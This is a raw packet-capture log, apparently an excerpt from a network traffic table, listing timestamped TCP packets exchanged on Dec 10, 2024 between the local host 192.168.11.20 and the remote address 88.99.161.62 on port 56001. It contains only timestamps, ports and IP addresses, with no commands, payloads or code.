                                                                              Dec 10, 2024 07:01:15.779010057 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.779295921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.864417076 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:15.928109884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.928203106 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.928212881 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.928570986 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.938344002 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:15.938608885 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.012510061 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.079632998 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.079644918 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.079652071 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.149974108 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.150135994 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176166058 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176290989 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176393986 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176461935 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176582098 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176594973 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176604986 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176615953 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176625967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176635027 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176645041 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176655054 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176665068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176673889 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176682949 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176695108 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176704884 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176713943 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176724911 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176753998 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176753998 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176799059 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176803112 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176803112 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176804066 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176806927 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176806927 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176819086 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176829100 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176837921 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176847935 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176855087 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176860094 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176870108 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176879883 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176903963 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176954031 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176954031 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.176966906 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176970005 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176970005 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176970959 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176970959 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.176971912 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177063942 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177063942 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177113056 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177113056 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177148104 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177159071 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177170038 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177180052 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177187920 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177197933 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177207947 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177217960 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177227974 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177237034 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177247047 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177257061 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177265882 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177270889 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177270889 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177282095 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177292109 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177300930 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177314043 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177319050 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177319050 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177328110 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177337885 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177347898 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177357912 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177367926 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177377939 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177387953 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177397013 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177406073 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177417040 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177417994 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177417994 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177431107 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177439928 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177450895 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177459002 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177467108 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177473068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177481890 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177491903 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177500963 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177510023 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177515030 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177522898 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177532911 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177541971 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177551985 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177561045 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177565098 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177565098 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177565098 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177565098 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177578926 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177588940 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177597046 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177607059 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177613020 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177613020 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177620888 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177630901 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177639961 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177649975 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177659035 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177663088 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177663088 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177674055 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177685022 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177695036 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177704096 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177711010 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177711010 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177719116 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177727938 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177736998 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177747011 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177756071 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177759886 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177759886 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177771091 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177781105 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177791119 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177799940 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177810907 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177819967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177829027 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177839041 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177848101 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177859068 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177860022 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177860022 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177872896 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177881956 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177891970 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177901030 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177911997 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177921057 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177957058 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177957058 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.177978992 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177989006 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.177998066 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178004980 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178011894 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178020954 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178054094 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178102970 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178139925 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178142071 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178143024 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178143024 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178143978 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178153038 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178250074 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178298950 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178306103 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178307056 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178307056 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178308010 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178308010 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178308010 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178308964 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178308964 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178309917 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178311110 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178311110 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178312063 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178348064 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178397894 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178397894 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178446054 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178464890 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178464890 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178466082 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178466082 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178467035 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178467989 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178467989 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178468943 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178494930 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178597927 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178630114 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178632021 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178632021 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178632021 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178632975 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178632975 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178633928 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178634882 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178644896 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178714037 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178762913 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178798914 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178800106 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178801060 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178801060 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178802013 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178802013 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178802967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178802967 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178803921 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178803921 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178805113 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178805113 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178806067 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178806067 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178807020 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178807020 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178807974 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178807974 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178808928 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178817987 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178817987 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178867102 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178963900 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178963900 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.178967953 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178968906 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178970098 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178970098 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178970098 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178971052 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178971052 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178972006 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178973913 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178975105 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178976059 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178976059 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178977013 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178977013 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.178977966 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179013014 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179061890 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179111958 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179111958 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179111958 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179133892 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179135084 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179135084 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179136038 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179136038 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179136992 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179136992 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179137945 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179137945 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179138899 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179140091 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179140091 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179140091 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179141045 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179141045 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179141998 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179141998 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179142952 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179142952 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179143906 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179143906 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179145098 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179145098 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179160118 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179209948 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179209948 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179209948 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179258108 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179299116 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179299116 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179300070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179300070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.179307938 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179307938 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179357052 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179357052 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179405928 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179455042 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179508924 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179508924 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179555893 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179555893 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179603100 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179603100 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179603100 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179603100 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179651022 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.179702997 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.223611116 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.227660894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.227946043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.297727108 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.297831059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.365345955 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.365569115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.395780087 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396039009 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396120071 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396132946 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396229982 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.396290064 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.396317005 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396328926 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396338940 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396430016 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396442890 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396452904 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396456003 CET4976156001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:16.396470070 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396480083 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396488905 CET560014976188.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:16.396498919 CET560014976188.99.161.62192.168.11.20
